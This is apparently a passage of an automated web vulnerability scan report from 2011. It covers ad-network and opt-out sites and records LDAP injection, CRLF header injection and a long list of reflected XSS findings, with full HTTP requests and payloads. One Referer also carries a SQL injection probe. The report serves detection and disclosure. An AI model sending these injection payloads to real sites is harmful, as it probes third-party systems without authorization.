HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:14 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1009.p10-sjc), ms h0-s1009.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:44 GMT
Age: 0
Content-Length: 206
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)!(sn=* was not found on this server.</p>
</body></html>

2.2. http://pixel.quantserve.com/optout_set [nocache parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://pixel.quantserve.com
Path:	/optout_set

Issue detail

The nocache parameter appears to be vulnerable to LDAP injection attacks.

The payloads c399e1dd97544dad)(sn=* and c399e1dd97544dad)!(sn=* were each submitted in the nocache parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /optout_set?s=nai&nocache=c399e1dd97544dad)(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 1

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS

Request 2

GET /optout_set?s=nai&nocache=c399e1dd97544dad)!(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 2

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)!(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS

2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkadvertising.org
Path:	/managing/optout_results.asp

Issue detail

The optThis parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the optThis parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.8184626 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.735603 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.5153401 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.9105494 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.7249216 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)!(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.6879694 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.6051098 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.384847 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.7800562 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.5944285 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

3. HTTP header injection previous next
There are 5 instances of this issue:

http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]
http://login.dotomi.com/ucm/UCMController [redir_url parameter]
http://optout.crwdcntrl.net/optout [ct parameter]
http://optout.crwdcntrl.net/optout [d parameter]
http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d927907/35/43624044/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b8a5%0d%0a91d788bd1b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d927907/35/43624044/decide.php?ord=1316296366 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: ES=9b8a5%0d%0a91d788bd1b; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:30:03 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 17:30:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1ce587bf7f31d0813bf9c7fac_43624044-35-42_927907-1-1; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=9b8a5
91d788bd1b_927907-9E[|M-0; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload 2eb83%0d%0aabef94bf3d9 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=2eb83%0d%0aabef94bf3d9 HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHIzxZewFTXBUgOFBKYHtrfgoKBQpCXAECVkBLQlUCJjFWfmp3CzQBfEMHZV4LB3JVCVV7cgViUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1psa08oOycGGRA5AmtmXgQAdl0%3D

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:24:55 GMT
X-Name: dmc-s02
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:24:55 GMT; Path=/
Location: http://login.dotomi.com/ucm/2eb83
abef94bf3d9

Content-Type: text/html
Content-Length: 0

3.3. http://optout.crwdcntrl.net/optout [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 8d123%0d%0ac8452c8724b was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123%0d%0ac8452c8724b HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:52 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123
c8452c8724b&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

3.4. http://optout.crwdcntrl.net/optout [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 71d66%0d%0a93e8c521907 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=71d66%0d%0a93e8c521907 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:24 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:31 GMT
Location: http://optout.crwdcntrl.net/optout?d=71d66
93e8c521907&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload aca9c%0d%0aae1dd9efdab was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c%0d%0aae1dd9efdab=1 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:40 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c
ae1dd9efdab=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

4. Cross-site scripting (reflected) previous next
There are 380 instances of this issue:

http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]
http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]
http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]
http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
http://adnxs.revsci.net/imp [Z parameter]
http://adnxs.revsci.net/imp [s parameter]
http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]
http://adsfac.us/ag.asp [cc parameter]
http://adsfac.us/ag.asp [clk parameter]
http://adsfac.us/ag.asp [clk parameter]
http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
http://advertising.aol.com/nai/nai.php [action_id parameter]
http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]
http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]
http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]
http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]
http://api.uproxx.com/ulink/feed [pid parameter]
http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]
http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]
